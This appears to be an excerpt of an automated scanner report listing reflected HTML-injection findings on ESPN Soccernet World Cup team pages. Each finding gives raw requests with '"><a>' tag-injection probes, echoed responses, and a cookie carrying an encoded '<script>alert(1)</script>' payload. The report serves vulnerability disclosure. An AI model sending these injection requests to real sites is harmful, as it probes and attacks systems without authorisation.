Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:11:07 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:11:07 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN32
Cache-Expires: Sat, 06 Nov 2010 23:16:07 GMT
Content-Length: 81049
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Italy Football / So
...[SNIP]...
<a href="/worldcup2010/team?team=162&_slug_=italyb2f74"><a>9d3befebb57&topId=792021&linktext=Lippi+takes+blame+for+Italy%27s+early+exit">
...[SNIP]...

5.60. http://soccernet.espn.go.com/worldcup2010/team/_/team/162/italy [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/162/italy

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6efac"><a>1119d197ed9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/162/italy?6efac"><a>1119d197ed9=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:09:13 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:09:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN18
Cache-Expires: Sat, 06 Nov 2010 23:14:13 GMT
Content-Length: 81157
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Italy Football / So
...[SNIP]...
<a href="/worldcup2010/team?team=162&6efac"><a>1119d197ed9=1&_slug_=italy&6efac">
...[SNIP]...

5.61. http://soccernet.espn.go.com/worldcup2010/team/_/team/164/spain [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/164/spain

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53655"><a>809ac03abe5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/164/spain53655"><a>809ac03abe5 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:29:00 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:29:00 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN06
Cache-Expires: Sat, 06 Nov 2010 23:34:00 GMT
Content-Length: 80715
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Spain Football / So
...[SNIP]...
<a href="/worldcup2010/team?team=164&_slug_=spain53655"><a>809ac03abe5&topId=808124&linktext=Andres+Iniesta+fires+Spain+to+glory">
...[SNIP]...

5.62. http://soccernet.espn.go.com/worldcup2010/team/_/team/164/spain [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/164/spain

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99b73"><a>65c93cd4adf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/164/spain?99b73"><a>65c93cd4adf=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:16 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN10
Cache-Expires: Sat, 06 Nov 2010 23:33:16 GMT
Content-Length: 80823
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Spain Football / So
...[SNIP]...
<a href="/worldcup2010/team?team=164&99b73"><a>65c93cd4adf=1&_slug_=spain&99b73">
...[SNIP]...

5.63. http://soccernet.espn.go.com/worldcup2010/team/_/team/202/argentina [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/202/argentina

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70388"><a>c589cccb3a6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/202/argentina70388"><a>c589cccb3a6 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:07:50 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:07:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN34
Cache-Expires: Sat, 06 Nov 2010 23:12:50 GMT
Content-Length: 81978
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Argentina Football
...[SNIP]...
<a href="/worldcup2010/team?team=202&_slug_=argentina70388"><a>c589cccb3a6&topId=805659&linktext=Heinze+wants+Maradona+to+continue">
...[SNIP]...

5.64. http://soccernet.espn.go.com/worldcup2010/team/_/team/202/argentina [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/202/argentina

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf5da"><a>9b858241cd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/202/argentina?cf5da"><a>9b858241cd5=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:07:01 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:07:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN13
Cache-Expires: Sat, 06 Nov 2010 23:12:01 GMT
Content-Length: 82086
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Argentina Football
...[SNIP]...
<a href="/worldcup2010/team?team=202&cf5da"><a>9b858241cd5=1&_slug_=argentina&cf5da">
...[SNIP]...

5.65. http://soccernet.espn.go.com/worldcup2010/team/_/team/205/brazil [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/205/brazil

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6da7b"><a>7d96bab73b8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/205/brazil6da7b"><a>7d96bab73b8 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:09:02 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:09:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN18
Cache-Expires: Sat, 06 Nov 2010 23:14:01 GMT
Content-Length: 81397
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Brazil Football / S
...[SNIP]...
<a href="/worldcup2010/team?team=205&_slug_=brazil6da7b"><a>7d96bab73b8&topId=806003&linktext=Ex-Milan+coach+available">
...[SNIP]...

5.66. http://soccernet.espn.go.com/worldcup2010/team/_/team/205/brazil [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/205/brazil

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36d87"><a>b513fd88d09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/205/brazil?36d87"><a>b513fd88d09=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:07:42 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:07:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN03
Cache-Expires: Sat, 06 Nov 2010 23:12:42 GMT
Content-Length: 81505
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Brazil Football / S
...[SNIP]...
<a href="/worldcup2010/team?team=205&36d87"><a>b513fd88d09=1&_slug_=brazil&36d87">
...[SNIP]...

5.67. http://soccernet.espn.go.com/worldcup2010/team/_/team/207/chile [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://soccernet.espn.go.com
Path:   /worldcup2010/team/_/team/207/chile

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 977b9"><a>d4b442ea0d6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /worldcup2010/team/_/team/207/chile977b9"><a>d4b442ea0d6 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
